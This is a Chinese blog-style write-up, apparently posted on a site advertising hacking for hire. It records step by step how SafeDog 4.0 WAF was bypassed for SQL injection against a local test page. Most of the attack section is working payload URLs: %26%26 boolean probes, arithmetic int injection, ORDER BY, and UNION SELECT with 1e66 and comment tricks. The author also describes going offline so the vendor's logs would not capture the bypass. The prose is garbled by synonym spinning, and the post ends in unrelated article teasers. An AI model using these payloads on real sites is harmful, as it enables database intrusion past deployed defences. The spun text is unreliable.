发现网上公开过安全狗的办法少之又少,并且根本都是给个大约点就完毕,本文章是将整个进程记录了一遍,因为一开始我也没想到我能成功的绕过去,大约进程是这样:Mysql根底有必要要有–>定位—>fuzz—>得出剖析成果–>手艺测验—>成功绕过。
网站安全狗:
面向网站安全,包含:网马扫描及查杀(自有引擎,只针对网页木马);网马自动防护功用(可自动阻拦网马 上传和拜访的动作);防SQL注入功用、防XSS跨站进犯 功用;防盗链防下载;以及避免CC进犯。
相关代码:
测验进程
为了得到更好的测验,我写了21行的缝隙代码,用来模仿进犯,并且在本机搭建了安全狗,挑选了4.0最新版别,在测验的进程中,碰到了各式各样的阻挠,最终成功绕过了安全狗,以下是悉数进程(边写文章边绕)。
恳求 :http://127.0.0.1/1.php?id=1 and 1=1
判别是否存在SQL注入:
咱们改成http://127.0.0.1/1.php?id=1and asd #没有被拦
http://127.0.0.1/1.php?id=1 axnxd 1=1 #没有被拦
得出结论 是正则匹配
只要把asd变型 或许 把axnxd 变型即可
http://127.0.0.1/1.php?id=1 %26%26 true #真
http://127.0.0.1/1.php?id=1 %26%26 false #假
http://127.0.0.1/1.php?id=1 %26%26 1 #真
http://127.0.0.1/1.php?id=1 %26%26 0 #假
加上两点:
假如判别SQL注入并且是Int类型注入:
http://127.0.0.1/1.php?id=2-1
因为这个INT注入类型没有进行转义成INT类型
所以就能够操作加减乘除法
http://127.0.0.1/1.php?id=2-1 实际上就成了http://127.0.0.1/1.php?id=1#2减1等于1
这样成功绕过了判别是否存在SQL注入
判别字段:
Order by xx #竟然没有被拦
安全狗是昨日(2019年5月16)下载的 因为我怕自己的日志被上传到日志服务器安全人员会进行剖析 然后得出绕过安全狗的SQL句子,所以我就断网了。
进行联合注入:
变型之前首要知道要改哪个方位
http://127.0.0.1/1.php?id=1xunion(select1,2)
把注意力转换到X这个字节上。咱们能够进行fuzz。可是我个人仍是喜爱手艺一个一个挨个的试、
这儿结合了一篇老外的文章:https://medium.com/bugbountywriteup/sql-injection-in-ctf-bef1ae0c5d9b
原理便是使用INT溢出进行绕过空格
仍是被阻拦
持续变型
找出要害所在方位
http://127.0.0.1/1.php?id=1e66union(1select1,2)
要害方位在1.这个方位需求变型
http://127.0.0.1/1.php?id=1e66union((select1,2))
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)
http://127.0.0.1/1.php?id=1e66union(/**/select1,2)
[1] [2] [3] 黑客接单网
0×01 原因 学弟有天在群里说起上传的%00切断的一些问题,就想起之前自己在这个问题踩过坑,想起了自己从前的flag说要写文章,一向没写,现在来填坑了。 0×02 通过 源码了解: //test.p...
IDAPython 库 flare-emu团队新开发的一个库,这个库是依赖于 IDA Pro 和 Unicorn 模仿结构,并为让逆向工程师可以经过脚本对代码的功用进行模仿,Unicorn 支撑 x8...
原本想用python DRF 的 JWT做,后来各种失利。终究尝试了用Php,发现十分便当。 PHP 版别 PHP 7.2.4-1+b2 (cli),也便是kali linux自带的php,至于com...
Web Application Protection(WAP)是用于源代码静态剖析和数据发掘的一个东西,WAP首要检测运用PHP(4.0版别及以上)编写的web应用程序,而且由于它的误报率很低而遭到...
Sysmon是微软的一款轻量级的体系监控东西,最开端是由Sysinternals开发的,后来Sysinternals被微软收买,现在归于Sysinternals系列东西。它通过体系服务和驱动程序完成记...
今日咱们来接着上一篇,讲讲WAF绕过技能的其他几个方面。 Unicode标准化 让Unicode标准化是Unicode的一个功用,用于比较看起来类似的Unicode符号。例如,符号“ª”和“ᵃ”有不同...